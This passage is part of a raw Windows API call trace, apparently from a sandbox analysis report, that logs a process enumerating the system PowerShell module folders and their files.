ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0264.648] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0264.649] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0264.649] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0264.649] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0264.649] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0264.649] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0264.649] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0264.650] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0264.650] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0264.650] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0264.650] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0264.650] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0264.651] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0264.651] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0264.651] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0264.651] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0264.651] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0264.652] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0264.652] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0264.652] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0264.652] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0264.652] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0264.652] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0264.653] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0264.653] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0264.653] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0264.653] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0264.653] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0264.654] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e390 | out: lpFindFileData=0x1b81e390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 0 [0264.654] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0264.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e5f0) returned 1 [0264.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e5b0) returned 1 [0264.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.654] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0264.654] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0264.654] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.655] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.655] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0264.655] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0264.655] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.655] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0264.656] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0264.656] FindClose (in: hFindFile=0x1a8dbce0 | out: hFindFile=0x1a8dbce0) returned 1 [0264.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.656] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0264.656] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\", lpFilePart=0x0) returned 0x45 [0264.656] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppBackgroundTask\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.656] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.657] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0264.657] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0264.657] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.657] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0264.657] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: 